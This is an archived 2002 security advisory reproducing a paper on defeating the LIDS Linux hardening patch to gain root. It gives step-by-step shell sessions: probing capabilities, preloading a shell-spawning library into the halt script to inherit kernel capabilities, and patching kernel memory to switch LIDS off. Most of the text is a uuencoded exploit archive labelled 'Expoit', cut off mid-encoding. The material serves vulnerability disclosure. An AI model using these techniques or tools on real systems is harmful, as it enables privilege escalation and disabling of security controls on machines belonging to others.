Visit our newest sister site!
Hundreds of free aircraft flight manuals
Civilian • Historical • Military • Declassified • FREE!


TUCoPS :: Linux :: Apps A-M :: lnx4997.htm

LIDS misconceptions leads to local root compromise



15th Jan 2002 [SBWID-4997]
COMMAND

	LIDS misconceptions leads to local root compromise

SYSTEMS AFFECTED

	lids 1.1.0pre6-2.4.14

PROBLEM

	In           stealth           <stealth@segfault.net>           paper
	[http://stealth.7350.org/lids-hack.tgz]:
	

	

	--[ Introduction

	

	

	LIDS was developed to protect systems from malicious root\'s  which  may
	creep in via various system-holes such as bugs in wu-ftpd  etc.  In  the
	absence of \"real protection\" the LIDS developers felt that  they  need
	to create some sort of sandbox in a way that evil attackers  who  gained
	root  access  to  the  host  may  not  be  able  to  replace   important
	systemfiles such as /bin/login. They should also not  be  able  to  kill
	important processes such as httpd or to modify the systemlogs.
	    I will show step by step that LIDS not even just fails to protect

	the system from attackers but also is a  securityhole  in  itself  which
	allows users to gain  root-access  in  certain  configurations.  Further
	LIDS may be abused as a rootkit for hiding files or processes.
	

	

	--[ 1. How to determine you are LIDS\'ed

	

	

	Lets assume that we already gained root on  our  testbox.  This  is  not
	very difficult as a lot of local root holes exist in  almost  all  Linux
	distributions. Choose one of the kernelbugs, crontab, modprobe or  sperl
	:-). LIDS will not hinder users to gain uid 0. LIDS  was  only  designed
	to put restrictions to user with uid 0 (root).
	

	linux:~ # ls -la /proc/sys/lids/locks

	-rw-------    1 root     root            0 Dec 31 21:22 /proc/sys/lids/locks

	linux:~ # touch /sbin/x

	touch: creating `/sbin/x\': Operation not permitted

	linux:~ #

	

	Ok. This is easy. The system is LIDSed. Obviously the administrator  put
	a READONLY rule to /sbin directory.
	

	Finding out which configuration the LIDS box has is already the  hardest
	part. We may do that with bruteforce. I wrote a tool called  \"capscan\"
	which tells you which restrictions apply to you.
	

	

	--[ What did they do with root?

	

	

	 linux:~ # cd /tmp/lids/

	 linux:/tmp/lids # ./capscan -b

	 b 0 CAP_CHOWN

	 b 5 CAP_KILL

	 b 6 CAP_SETGID

	 b 7 CAP_SETUID

	 b 23 CAP_SYS_NICE

	 b 27 CAP_MKNOD

	 linux:/tmp/lids #

	

	

	Aha. Capscan bruted the most important capabilities for us. We  need  to
	brute-force (i.e. try chown(), try create_module(), try  chroot(),  ...)
	because LIDS does not use the  Linux  kernel\'s  capability-bits  inside
	the task-struct so we cant obtain it via capget().
	

	To better understand which restrictions are placed  on  the  system,  we
	will have a look at the configuration:
	

	linux:~ # lidsconf -L

	LIST

	                Subject   ACCESS(inherit)        time        Object

	-----------------------------------------------------

	        Any file  READONLY(domain):  0  0000-0000                  /etc

	        Any file  READONLY(domain):  0  0000-0000                 /sbin

	        Any file  READONLY(domain):  0  0000-0000                  /bin

	        Any file  READONLY(domain):  0  0000-0000                  /usr

	        Any file  READONLY(domain):  0  0000-0000                  /lib

	        Any file      DENY(domain):  0  0000-0000             /etc/lids

	        Any file      DENY(domain):  0  0000-0000           /etc/shadow

	        Any file    APPEND(domain):  0  0000-0000              /var/log

	      /bin/login  READONLY(domain):  0  0000-0000           /etc/shadow

	         /bin/su  READONLY(domain):  0  0000-0000           /etc/shadow

	/etc/init.d/halt     GRANT(domain):1000  0000-0000         CAP_SYS_ADMIN

	  /etc/init.d/rc     GRANT(domain):1000  0000-0000         CAP_SYS_ADMIN

	  /etc/init.d/rc     GRANT(domain):1000  0000-0000         CAP_NET_ADMIN

	/etc/init.d/halt     GRANT(domain):1000  0000-0000         CAP_NET_ADMIN

	/etc/init.d/halt     GRANT(domain):1000  0000-0000         CAP_SYS_RAWIO

	/etc/init.d/halt     GRANT(domain):1000  0000-0000         CAP_INIT_KILL

	  /etc/init.d/rc     GRANT(domain):1000  0000-0000         CAP_INIT_KILL

	      /bin/login     GRANT(domain):  0  0000-0000         CAP_SYS_ADMIN

	      /bin/login     GRANT(domain):  0  0000-0000         CAP_NET_ADMIN

	        Any file  READONLY(domain):  0  0000-0000                 /boot

	

	

	The attacker is not able to issue  the  \"lidsconf  -L\"  command.  This
	command was issued from a LIDS free session, which root may be enter  by
	giving the correct password. Attacker does not know the password, so  we
	have  to  look  for  some  other  way.  Almost  all  systems  will  have
	CAP_SYS_ADMIN  placed  to  the  bootup  and  the  shutdown  scripts   or
	otherwise you won\'t be able to mount your disk  etc.  CAP_NET_ADMIN  is
	needed too to configure your network as well as CAP_SYS_RAWIO is  needed
	by some programs. I took this config more  or  less  from  the  examples
	shipped with LIDS. As you  see,  apropriate  system  directo-  ries  are
	protected etc etc. For our reasons it does not matter which  directories
	we can modify or not, so do not get stuck at  this.  The  inherit  level
	tells LIDS how much fork()\'s within the program are allowed  and  still
	have the same  capability  granted.  /etc/init.d/rc  for  example  is  a
	shellscript and forks off a lot of commands such  as  \'ifconfig\'  etc.
	and thus it needs to have a certain inheritance  level.  Usually  you\'d
	use -1 (-1 means  unlimited  inheritance)  here,  but  I  never  got  it
	working with -1 (bug?) and so I used 1000.
	

	 

	--[ Gimme your CAPs, please!

	

	

	The  following  seems  really  trivial  but   LIDS   is   just   leaking
	capabilities bound to certain programs such as  for  /etc/initd/halt  in
	this  example.  \"x\"  shellscript   will   create   a   shared   object
	/tmp/boom.so which  forks  a  shell.  Nothing  special.  When  executing
	/etc/init.d/halt script we preload this shared  object  and  obtain  the
	shell from it. Lets go...
	

	 linux:/tmp/lids # ./x

	 OK

	 linux:/tmp/lids # LD_PRELOAD=/tmp/boom.so /etc/init.d/halt

	 linux:/tmp/lids # ./capscan -b

	 b 0 CAP_CHOWN

	 b 5 CAP_KILL

	 b 6 CAP_SETGID

	 b 7 CAP_SETUID

	 b 12 CAP_NET_ADMIN

	 b 17 CAP_SYS_RAWIO

	 b 21 CAP_SYS_ADMIN

	 b 23 CAP_SYS_NICE

	 b 27 CAP_MKNOD

	 linux:/tmp/lids #

	

	

	We obtained CAP_SYS_ADMIN,  CAP_SYS_RAWIO  and  CAP_NET_ADMIN  from  the
	halt script. It could not be easier. This will  also  work  with  setuid
	capability granted to xinetd for example. Users may gain root  with  the
	help of LIDS!!! The inherit-level does not come to  play  here,  even  0
	would work fine for giving users a rootshell.
	

	Let me conclude what happened  until  here:  the  capabilities  such  as
	CAP_SYS_RAWIO  are  leaking  (\"inherited\")  to   any   subprocess   if
	apropriate inherit level was placed on  the  file.  We  may  gain  these
	capabilities via preloading shared  objects  or  by  setting  the  $PATH
	variable  if  the  file  is  actually  a  shellscript.   Even   if   the
	inherit-level is 0, i.e. the capability is not inherited  across  fork()
	the LD_PRELOAD trick still works. That is because  preloading  does  not
	create subprocesses  and  inside  our  preloaded  library  we  may  call
	setuid(0) if CAP_SETUID was granted. The executed shell will then  be  a
	rootshell.
	

	LIDS  however  is  still  in  kernel  and  protects  /sbin   and   other
	directories from tampering. So lets continue:
	

	 linux:/tmp/lids # cc lidsoff.c -o l

	 linux:/tmp/lids # grep lids /proc/ksyms

	 c02a2120 lids_load_Ra57ab5ad

	 c0120a10 lids_cap_log_R0d747633

	 c011e088 lids_cap_time_checker_R9f27daab

	 c02a2124 lids_local_on_R641824fe

	 c02a212c lids_local_pid_R2a2dd337

	 c011dfb0 lids_local_off_R445f75c1

	 linux:/tmp/lids # touch /sbin/x

	 touch: creating `/sbin/x\': Operation not permitted

	 linux:/tmp/lids # ls -la /etc/lids

	 ls: /etc/lids: No such file or directory

	 linux:/tmp/lids # ./l

	 Usage: ./l <addr-of-lids_local_on-in-hex>

	

	 linux:/data5/cvs-work/lids # ./l c02a2124

	 # Patching [c02a2120]

	 1 -> 0

	 disabled global LIDS protection

	

	 linux:/tmp/lids # ls -la /etc/lids

	 total 32 

	 drwxr-xr-x    2 root     root         4096 Dec 31 15:23 .

	 drwxr-xr-x   52 root     root         8192 Dec 31 19:12 ..

	 -rw-r--r--    1 root     root         6760 Dec 30 21:11 lids.cap

	 -rw-r--r--    1 root     root          987 Dec 31 15:48 lids.conf

	 -rw-r--r--    1 root     root          970 Dec 30 21:11 lids.net

	 -rw-r--r--    1 root     root           40 Dec 30 21:23 lids.pw

	 linux:/tmp/lids # touch /sbin/x

	 linux:/tmp/lids # ./capscan -b

	 b 0 CAP_CHOWN

	 b 5 CAP_KILL

	 b 6 CAP_SETGID

	 b 7 CAP_SETUID

	 b 10 CAP_NET_BIND_SERVICE

	 b 12 CAP_NET_ADMIN

	 b 16 CAP_SYS_MODULE

	 b 17 CAP_SYS_RAWIO

	 b 18 CAP_SYS_CHROOT

	 b 19 CAP_SYS_PTRACE

	 b 21 CAP_SYS_ADMIN

	 b 23 CAP_SYS_NICE

	 b 27 CAP_MKNOD

	 linux:/tmp/lids #

	

	\"lidsoff\" is just patching the \"lids_load\" variable in kernel to  0.
	LIDS won\'t check any actions anymore then.  This  is  possible  because
	/etc/init.d/halt  was  leaking  the  CAP_SYS_RAWIO  capability  to   us.
	Capscan shows that we got all important capabilities (capscan  does  not
	try some capabilities such as CAP_SYS_REBOOT etc. :-) We are  done!  The
	\"1 -> 0\" tells you that LIDS is disabled.
	

	

	--[ Discussion

	

	You may be surprised how easy it was to disable LIDS.  There  are  other
	ways to do it. One may hijack a LIDS free session by using a simple  TTY
	hijacker. Commands may easily be inserted into administrators  terminal.
	I don\'t like the idea of sandboxing root, there is too  much  that  may
	be overlooked and which is not fixable that  easy.  One  thing  is  that
	they still share the same homedir.  Even  though  if  you  can  make  it
	readonly, i don\'t feel comfortable with it. Rather I like systems  with
	ACL\'s which may be applied to files and a capability system where  root
	is still root but programs such as \"passwd\"  or  \"ssh\"  don\'t  have
	setuid root but apropriate capabilities.  SELinux  is  way  more  better
	approach for this, even if I hope that .gov extensions will  never  make
	it into the Linux kernel. Putting a portscan  detector  into  the  Linux
	kernel is probably also  a  bad  idea.  As  less  code  as  possible  in
	critical parts of the system!
	    Once an attacker broke your LIDS system, he does not even need to

	install a  rootkit,  LIDS  is  one.  It  allows  for  hiding  files  and
	processes  and  once  the  attacker  changed  the  LIDS  password,   the
	administrator lost his machine.
	 

	

	--[ Links

	

	

	[LIDS] http://www.lids.org

	LIDS system, FAQs and documentation to LIDS.

	I tried version lids-1.1.0pre6-2.4.14.

	

	[capscan] http://stealth.7350.org/lids-hack.tgz 

	This paper with programs described inhere.

	

	[SELinux] http://www.nsa.gov/selinux

	SEcure Linux. One more toy to play with at home.

	

	

	 Expoit :

	 ========

	 

	begin 644 lids-hack.zip

	M4$L#!!0````(`)FS(BQKN@(C*`\\``*@G```+````87)T:6-L92YT>\'3%6O]/

	MVT@6_WW^BFGNI(*$34*AM&AW[SA@=]&RT`-ZJU6UXB;V))[%\\42>,2&GU?WM

	M]WEOQHX#J=1K>[JH!1R/W[SO[_/>6/SQ;=+_?/M!7BCGY7GEZR;7M3PU3HU+

	MG<N;I?-Z)I-$7IR?WLC?UI_#DW^(/YY^][F?C;3`&CA0I2_D-_&/OSH]G:BF

	M]&FE_7?R.5.!%CY)\\H%ELGF3>6,K?,5B+)23N7[0I9U#1F_EO+9>9UXZ%M?)

	M26UG<J9*DQG;.%E;ZU\\ZN2A,5N#KI<AJK>?25/+!*/F@:EX5\'DX*6VI<-%B*

	M;<;-U-\'\"19-,_#R7VF<I>)*^T$*-G:XR+>U$#FJ(UK(!3@>T(.B\\9;0&6[KT

	MN*\'HAU[*2C/WQ(WR6CH[HQ^U)X).5?G8/M+6\"O(NPV/ZP912>:^R>Z*W**R<

	M*E.!#(DH5)9IYT@AM\'MAX1*05E;6R[&6Y!%TK];S4H%M,YMC,U6U:IL8\"\"Y:

	MP7?\'IMHM[=14J;PE;EUAFS*7JG3V*<5[4Y8K<@)J(#YZ6BP\\Z<[6M\'AF<S-9

	M,H=A7VSB4B\'Q.9<+HH2=%N0U<SE>AM\\L/&N3=H9\"*_E[`^DFRI2NYP!B137X

	MP$I7X\\8\'WHV#1IW.FMKX)1F;=&R\\T^4D>(A096D73C:.GO-!Q:S@)\"H8EYF&

	MK/3;5A,S;6I%5G>I_+ZIP4/-S`I2/JL)I\'+2@V(R]P:<0QF%R4TUE:QW4DZG

	MMS3Z_BB5/T(58\"\'77M<S6%HN;2-5\'7SKI<XI)+0\'9><:N`\\K:H$M2_A4ONQ[

	MA[25M`U,H)V\'9Y%5H0K\\@TK%@ZZ7$G:9F`R!&5@M+7MB:3.X-E,(H:$?#51/

	MCEG.R,6@+GEAJN91Y+A1&V@ZZ.*DL-8A/\"H.$3(-+%\'IDF)J1V:UK;P:[Y!#

	M0\'+HR=;\"(4Y*>91LI\\\'<[`]D\\\\)4E-C6;=*87`[;E>#95N52Y-J9:17S`HQ>

	M:V**HY*?)!*@BX3$C\\LM$FT;*B])AJ-_RS])^%12*KE+!MF%.^V6)L</F]T[

	MD=2+F*/(8T=!,?3I_HB?H3S5F7PUDGNCH[V]S<166WI+H;+K*.H>!5\\=24X,

	MY\"+_C#=>\'LDK:(B=C=4R)Z_P\'G[0D1+BZGYE7*W<D@.X#0M\\1_K2>2JOQ@^4

	M^,H0C\"J\'?Y$!E8<A2\'-*7I\\=GUY=7OPJZR9$.O,!1ZD1;+9>0FO?PS#$HL4#

	M(<&NA<0J#U(V*Q0SU7HG)=%\"U;`8)%&U3^4OFC-6;J,GDYG&=>,UXB73*64(

	MBG2PYJTM!3R3JMP@4W.7*63=P(\'7)4Q(D1*NUUQ`S><DL:7[;:#]0IOE<`?.

	MR]B=-R:+_@4KY,I,62YW_6P>;-C>Z+[!@G0W\\B*3L9!C>,\')\\;N[DQ^O?KFD

	MRP.^_.G\\XH*N7O/5S=GM#^>G=\'W87K\\/UWNOPA>_WMQ=GI^<\\5=AS<\\_75Z=

	M;M@?W!X7\"J$7F6#=L5B28W65\\\\&F&IO2>(.0IFS4.%9_6Y3XR835+K=,\"MU[

	MI(@,J;G:VMX)%URW[A\"_\\([NRX+41E=IFFZ+L<X4(BZ60JLYW5`,!L<@_F-6

	M0(\'N>%HF8V1DY!AG<EXIO\'+W\":S84)6WE.(RDL*..0LCH5(EQ_-3C;UAUEN+

	MS(O`@%R4.!QDSC=Z`U(IE\\-<1F<-<;)#6U#V@8,^:,Z&]EZ&RKWNX4=KF0-6

	MH+LRN0!4N;D5\\LGGIAG_3DA%RN.3D[.;FRU3H5P8O]TN\\`9I/\'ZN>*WX+#36

	M[7Q<+;G$R\"Z:MW([@]:VCRA)R2$^\"?V0SSZ[0#M?@0XGC:_\"S]>BT[CZJ]`I

	MS7@#\'?J<GEU^$AU2,<?N%]%A*JY0N5ULI\'/\\[MW9Y>DGR;4+.$RX3ZQ4\'F#@

	M?Z.?3?P$4J[Y7#K\\-RJ43_/=`GT$+_CA^OCRMJ,SXJ>?$VJ3Z/\'IS^=(P[)/

	MJL[^7X0NSVXCH2\\4[:L1(M&NCW\\YO_I20N>7Y[>QRGV9COJ$GKKC,T(?<:.G

	M1OL2.BM5?WGZV!U3SX921>`K]BD1CW>=E0&L#Z5RT\"LM`U2@V0P5+>`\\$:\\8

	M`_,3>>Q^0MF=H-M%Q^,<JM5.6P0)K<;^1%>HDP*]UM0\\$)0+):XFC`=8YMS\"

	MUMCIN&6QJ^+W%34G6-PNVD%I%JB;7#+!/==,PA;<VEINC-#+IN)XU3FT+3LC

	M?7YPS5YM<8X]+:FLF4L2EE\"!*QJ/W%!)E]5F[KF+XFT6QH56:6&KEVN]ZLPV

	MP`U+ZH30KMQS0R_63,LV``KB72T]T]9[\'9ZKM(>T]]0E+8`T\\5NL14^/`#6P

	M)#O`_[16,T<(UI-6/.\'S0!<LU=3\\2#173K#A2%3]J&9S\'D449DYS#L:D9%#8

	M(J!;I_4.\\&QMY[7A\"4*`^!&>)Z(F;,<()[3\'FN<788;Q/:D*P@##.0)\"@%\"=

	M86>*D5/HAENP3[0\"[&I;>%#`:C(Z069Z$.@+#7N31:1DT,F2=T>,`P$?=!G1

	M.7LF-?HS:GS@)/=;VS2C@9`F`+&H,Q(@M.340\\/PSG>NPGA-S70/.4H\\`W^&

	MPZXG\'D%^&\'4:9P`%,<*.PW2)!WC09++J?6-@A4&&@+U?FDDPVLN@Q>\"(#:N/

	M3,X=9D2,[8@@2J]H5,0:2,5[UT\"B)1GQ9<YH.!G)+?R?:05;-%5IT-9!WMZS

	MVQ)_PMXTR#C\'9FC9Q11L8F?R1@I<]A\"BA`[[+]M!61:+>?Q`:1;`6\'+#\\X.9

	MS:(WPW71C4,KRND7,1U-+.F;2,+%$)PTW:*FJ4:\"4\"6SP/:#\'GD.@X>9@7Y3

	M(<:(-`[<5A%M$\'1C(3))9Z58:-CXU+@&4Z5B\\#A8,Q4GBC@R(R/\"/8#=`ZKF

	M3@@Y8I92C\\\")+EA5\"2:1RDM+_@6YYCJ#*&AY\"EUA,YTUW&D_*WSMKN2/NK0J

	M%\\S>^KZDZ=B*L$O27B$%@Y#D`<W4HA\\2FUO&1R&O?MITZ^+T[MWUV<75\\>FW

	M:Z(]Y?)_WHF.]IZ6/WQW^`0T4\'LZ>EIN/[.+12<:%`HEKU\'<6=^45;^>OKL,

	MRIH)]D/>1<O+`\\PXNX2[&UW\'00G[%$\\\'.;%S\'#GM:4\"TRBPB9A9RZ4<PYCEE

	M=(XJW_-LBFIJ-S`,E)@77<XIHU#8O\'CQHI\\6DY`6N^R;4<&@X54)4B\'F>>(Y

	M!\',D`+,XH5D@MA>Q9H?!6)@O!E?GP:\"<<;>:E0WZZ`5-.0J%8D):11DT)=,_

	M\"A6_/Q\"($?JDKE$I:4-]:Q#9U_E@F]A5`$*N&<<AIC237F42ZQ6`<,IZTTT(

	MJIO^3&,<N2=,(?>(&(0<POT0Y-)/U19-?XMA_OSN^/9\'\'N]S\\3>3;BLD+J$R

	M\'Y+P6B5(Y1GI.JY=MQ`<9;@CPRRDK[\"EB*BMTXA466V=BV4MC#JZ4*8TB@H9

	MRA@9TY$7PC1@JAV7],1<^44\\)NAT3,6]RMLI\">7R^!B/`\\>UJI>4MTBE&4,M

	M]NBMX3:)MXIO-D=7-6\\9>E`ZA!BL&,\'1X2E/$HY:=[%8Q:D:D7Z\"4#!?F.DP

	M?Q%\\N#@\\Y%S)4+\"\'+\"+L021!@=4TE3=`CY0VX;RP9Z./-J;.+..)\"VIVFLD$

	MCVQ:-*WUG)?%&>R]6\\[0;F?#/;4WVAORK3M2V]VU.CA4XP/D>-S%+36*=V%J

	MK)C>70_SP_W#UZ]>\\8*1\'KYYLUI`DYN[K-`$DN^NWT[V#G.EQMU&^^U&L,6=

	MK>ZN7^^/WNSM3W2W(NNOF!OP@Z_S_-6KP[!=/AD/UXA,)G?7^_L\'D\\.#;+1)

	M\\O6ALOR,J?(&HNUP?#6X*-W1ZO(()3:D#PXTNS+S<G.5@LW>.S5%%L+?\\AN5

	MYW5B)\\F:LA)3)85^_&[E!+GRZF`W>W`)15\"/6J=N@>MWRF=<[C^TUOY-R)%,

	MOI-#0?`_\')).2SL&JF%?7AWAB4\\3WEN/9U_M21\"L%X]U0O^HO=O[R-\'`_O#M

	MZ_9H8\'1PA.J8/GGTX&./OAF]W>L>?7N$H@Q((>E$HD[H\'ZWYV(G$Z\\/7\\41B

	M2\"<2HQ%[4@K\'_50*\\NV;PQ[C^V\\B!>#A3R=QN(D)U-)/I@#]]2A`>TQAOO@$

	M__]?8Z1A!T3^=GYYBCO7_XAX9R-\\>MTAF9^O3M]?G\'T,4XW>=-^=_\'A]=77+

	M7[[MOGQW>WT<8=570E^#F%0\'\'<\"?MX\'4C2(X8PYZU;7+^<`\":#3\"H1QWWYP3

	M&1^H=NI>+;GII:*R.JN:HV0:HA6KX/,I%%6J%H`0)^OPI-<$\\CD?^OIH73I1

	M=MWA*\'5-JG]BO0XSMEJ?H,HK*!_2N0:W\\9LPTHJ)L[_!.*$O/$JV\"<(28,IM

	MI5]P61V$S#/HG4^M#K8A?YN0VE.I4^.RAJ<V0OR*Q7%<XYH:J(I:.FJ?Z8\"/

	M>T#%O6>D$><$MP3OF(MN^.*$YW:=&I.K*J\"#PORNR$+/QT4$J1I\'Z@9*,MP[

	MW][^*L(#!)]/V@Z9Z!\"F+IE\'8!(T?=S`$C3L\'RV\"33[*1O,ESDD[\\)#2W(=F

	M\'D!&]5Y_H(TI_\'?H9LU].XUD>&3`JJ.7.>CD&/\"#ADUQ0A`ZOPC*)N8QS\'[X

	M!0H^#B6Y0QMH@E<(/O<+X(5AY6JR4,#NJ&`1%_K\"-M.\"\\!-9CV<A\"JP;.F96

	M.9T_[P@3A9IH!`/`_(2<C#C@9@!Z%]>*K7$>Y%Y-P\'#[^.2B_Z8*(Z[YO#2A

	M[0BO\"I\"(2O2\\/<Y]%JPC3I<=%.,KZM>?-=\\#GMKE`X$2/7\"N&$2V>7H1FY_N

	MZ=Z0J1\\#P&EGX0P/V)7>4N&HC@=OX+NV*K3@W-/\'/@;*.X=:Y]$DZ=0^`\'%Z

	M79\'#N8`V>;S1Z9:=Z.EY82K>-0\'K*TEQ\'$)6>\\8:FQ_A)%.CV(\\)]E.[I^08

	M:(^\\CH=J-(&#R8\"F52\\=T6L>@/6&WH.@8VK7OLX0]/Z\"9\\%7--X!!]TD=US#

	M\'\\.(A<.J/5<L]`K2LS[:$U?$C*>TU+TDLM-E!J00[F#CFRG/7AZ),\'O5%`A+

	M[/C^9#DK5#6-9\\$!ZG13VV?\'_[*D\\2R-EF>*\\KX&S`@Y\">J\\=T)\\(`J_\\7L]

	M1[N[B\\4BY3)LZZE8$_;[X[\\\'[G*;-3-=^?A2@`T)\"@D`S1\"8@K4YW1\"59)2.

	MTB%:F=?)7KJ?CO:1#S_$G-QM&=\\E2P]?\'0QI6ZY=20%14S_]EQ1<4^9JWK[K

	MT;E_KJG1&[>S-4W$HQ.OR5,Y19ZYZS072\'%SEM$`F!?&S,D5S\"Z[7ITWHA8;

	M*8-RN/@/4$L#!!0````(`-J,(2S1.U.NB0H``&0;```%````8V%P+F.U66US

	MFT@2_BS]BK:NXD@.D2WG9;.QDRN,D$U%$CI`<5Q[6RR&P:*,0`?(CF_C^^W7

	M/0QHD.U<4EN7*LDP_?YT3T^/LK_7ACW0TM5=%ETM\"NAJ/3@\\.#@$NV!>7\"SZ

	M1%;C&#@YAXSE++MA`:T3R6)!E!=9=+DNHC0!+PE@G3.($LC3=>8SOG(9)5YV

	M!V&:+7,%;J-B`6G&_Z;K@K0LTR`*(]\\C\'0IX&8,5RY914;``5EEZ$P7X4\"R\\

	M`K\\8ZHGC]#9*KL!/DR`BH9RTD-R2%>_I>=#?<BV\'-*Q\\\\M,`.==Y@>$4\'OI*

	M6KW+](9(`@E2@O^2M(A\\IB!\'E$.,^DC-QBP/K^D3&O5C+UJRC&-W^-`1-\"@A

	M4CF\"<09K=.[_XPN440I-0>JOERPIO\"II^YB/%.D9++V\"99$7YQO@><)(L1P&

	M#^Y5G]>&%]RPK(AR,KF1)P/(2(LA\\XHUE@ZEG<H#_>9!Y&E8W&+:A%L<\"32R

	MBKV[K4@\\_SI);V,67#\'2^UY(`#BDI\\2NP\"#]>!VPC6((V`V+TQ5&<7G7J.G7

	M?11ED\'A+5JVC[W<$,EPR\\A+!3($E09J1QQD96:9%Y:LPF:.%+,(-`2&2FU%5

	M%0[YBOE4WR@44>%G5-E)I8@J/<\\%I+3HG!DVV.;(.5<M\'?!Y9IF?C:$^A),+

	M).J@SITSTX(__E!M)#]_#NITB)\\+$M:_S\"S=M@\'IQF0V-E`*U5CJU#%T6P%C

	MJHWG0V-ZJL#)W(&IZ<#8F!@.LCFF0MI)R4-),$<PT2WM#%_5$V-L.!?<ZLAP

	MIF1NA/94F*F68VCSL6K!;&[-3)MKHRB&AJV-56.B#_N`3J!AT#_K4P?L,W4\\

	MEJ,ZT=$C]63,1;G:Z06*6[KFD/N;)PTA06?&\"M@S73/H0?^BH^>J=:%0_)HY

	MM?5_S)$)B:1MJ$[44XRE^S]00+RUN:5/R#^,VYZ?V([AS!T=3DUS:),J5&_K

	MUF=#T^TC&)LV!VANZPH:<51N\'K4@.DBFH.:VP7$RIHYN6?.98YC3\'BDZ,\\\\1

	M\"\'161>DAQ]2<\\I@1$].Z(+V$!X=<@?,S\'=<M@A##<RR5L+`=R]`<TB9QHE7\'

	MM!PI6)CJIV/C5)]J.E%-4G1NV\'H/,V38Q&\"4EL]57DKFG(=/N4\'?RD>I,A6>

	M03!&H`X_&^2\\8,:\\VX:H$7-$FNRY=B;0IR+?;_]-[%0XSHL@2ON+CXVE#+=\\

	M<VV=8.\\)FFNAGQ3QMF@01Y=;:W?Y?G&W8OG#Y3SUKUG17$]8$>%G/TJV^*.K

	MQ(L?ZHA2?]L++AXVU^(H67_=QX-N\';,FA659DC[4NRHRSV>/^(Q=N[\':\\;U5

	M?]%IM]E7;+T)-L$\";KVHZ-+#7N^HW::\'(KMS_45ZFW1[[3_;+7_A84?[[7?X

	M`)W]8KG:#]/T\"__7.6JW2\"!3(`R0O+S.\"[9<=5<](H30Q=5C..BU6RT\\/==H

	M\\``)?ISF#$EDKK6_1^;`@ROLC\"^]6VRKF\',N7+JP4N`*9:.@VWLQX,]7Y7.O

	M5HV622^+<\\9?\\7U`NM<)(GE=>B/L9T?M^_8FREQHIC!IC>$;2J,1QM=)\"[F2

	MBP5.?P&2[3JL=DMFDDP.\'IB\\:IB\\JDU>;9ND!4[_GLF*Z6F3UU$<EP81;4S;

	M>\\C7(9XQ+/][#3;G07QMXY2:Q2/6GE\".XXF(!O<B\':RT4;P@R%P:[*)DJT3*

	M;=2=C5QL<M2/3.V3BTU)5R<*6OQ>W2S9$N/M[J)29%50^;]9&G;QM4=R^+>/

	M\'S?TEE%\\AZ;4TH9$6J59@81%@2-0]^W;MS78/(@P4!#V9A![O=*<;.O)NA-E

	M)]5WL^PJR\'#/NYEWNZF!IY&QU/,2EAJ7CVBT!RC8L\",EIW7?EE!#LZV-8<QY

	M:54P=/G*2RRN#Q^X&<JLZ`T^3V(!?H83&7/+=M3%&1(\'+]X2]DI8W$+N&X*-

	M&^\'=2H#4U-+Q<%1B\'04&AZ]>D_\\!B]D#L@1@5^C:>\"EUJBQ-BPV8655#:7;=

	M%8%QO,J>PIEY\'^O4F6RQK]@#>?55V2R7!KT23]XC=S,YH[#S0>!;>X(YC=*M

	MK.(\\F:`YG\"WWK[&`,633M8;F=\'SQHSWRB7WG!<M(;M\"+WP8\'AZ]_W^R3A;Q)

	M%GR+8)-9I\'E!@RR1&S31<VIZ9Y\'&W@[Z^^:Q7I!O:2JR&.,L-3WN+Q6]Y#,M

	M4\\4?U7TC\"C/V+_KFC:W(_-5=%]_Z^\'\')C@*=..W46Z%+TD]MF^&I5?:3VG>0

	MVR;)\\[.8*Z&F9VJGQF@T5D]Q[MU%BX]VV\\J;,/:N<MC]`/]!&7<^.WI<H_VS

	M&K]]@(W\"[RNK2X0XG@:]\'`PVB/N+*,8N)SJ7`)(OXDJY8>0=D\\>,K;H#L3\'J

	M/7)?\"@KE,YHL=5=U\'%4[4RH3!X3^]SMEBY\\Y@A_/G4_&>$SJ^6:;SLN7Q\\_M

	M)=[PQ*DC#GDQF00\'G:J82Y[-.CKT]N#@F^T:(^W,4N#P^/C=8Z7]J,(FO&U1

	ML@+5&R]>LR.Q#_>H5L6AU]U#9WMTIM]C.UWE?(9\"H3\\1G8ZFSEP-1_HI>E9/

	M7/<*4@>\".E0UU\\2!W\\+;\"S(1))Q^*-\'QX!RZMJ[B=4MF>2581JA?MV3*ZXIB

	MZXXQE\"EO!(7R(\'RB#\'\':6T%#H5,NM1EE./V7#7TNT]>\"_FY#G^%?V>RO@C0V

	MIO,OKC&9S!VZTLDL@PHOW.\'N\"5[L7\'&A$H;H^\"X9!S*C9:I#3;6=AJI#B4,=

	M3HP*_KH_E6RO)#8\\A\"4F[/(E2X6D,=/<,7:=AIDW$O%!#@8UG!>V.S&\'\\W$5

	M27D`EDR_2$SH@F$*\'G[,E\"SO)!8L:M-TZF*B<ZYD^E5B*C>K8\"HW<%E2!S*3

	MJFD-T`X\'$E4&;0/8X:\'$<E(Z4LKO[R^\\A0?O/Q+7*XEKNDD@C2&EFM=RT+IM

	MSBVM6?MO)`;\'F#2),JZ.<^\'B*#LR3ALL%:J33U.S*E3>*DIRA>A85^V&[I>(

	M0?<FC8*]WL%]^QZ[9QNG:3Y3>\"OO$J>6H(]/+@M#YA=XF5&@F6%^A>_WRTLM

	M;\\9\"3CPK_#9&)T%C0D,*[$)W<\'S,2;U-(USAU;=PD4X\\[CIGF1MXA8<C6\\)N

	M%=A>3..@/@<BT9!\'QEB\'O1\"?RIZY@Y+P[1OL<.:Z+;[D<VW(SXC-/%,4=PA0

	MY_9%W7)WPH=\"W,NP&R)GHL.SKY`8_\'N&W_],.G0T`W123DHY*2U)2%0`R>C2

	MRX\\2JOP]2A8LBPK\"3ZS4OP)CLEKH?D.&OS=D^$HM0U,%OQW-R%N8LMOG.?U4

	MZ24^\"W#XK#3U>!N\'](9EI`\'2A.7\\\"H6B9ZKV::?\\C9%^<V5A`6B/0;!F].N@

	M1_FZP1D84)A^PN._R\'HKWTNX!CQ]<83@>2G/BNCW/C]8:-!$+.\'%BTB:8T7M

	M;(/3D.S![FZ)+^Q4`MO(-`7X,\"RGC,&S`)[E/!<-ULTKG7?E5-!N\"<D.\\E>W

	M^\\<1Y;DH(G+I24S_`B*-5/\\8)M\\1>8!*]%.H<!BF*95I7M^WFXFCF:M9Q=N3

	MXH\\BN_G/$([J7\\1QLZE^$,4G!1Y@N/JYR@K%C:AWU-JZWA((E]D:;X\\DU]WN

	M<2+^\'PR=<]#0QA>W5VDZYNMU.BZ?C(*SE1!MQ].B\"9H^#V_J_P502P,$%```

	M``@`VHPA+&1QB;K2`P``U0<```4```!C87`N:+5476_B.!1]YU=<J0_3CB(Z

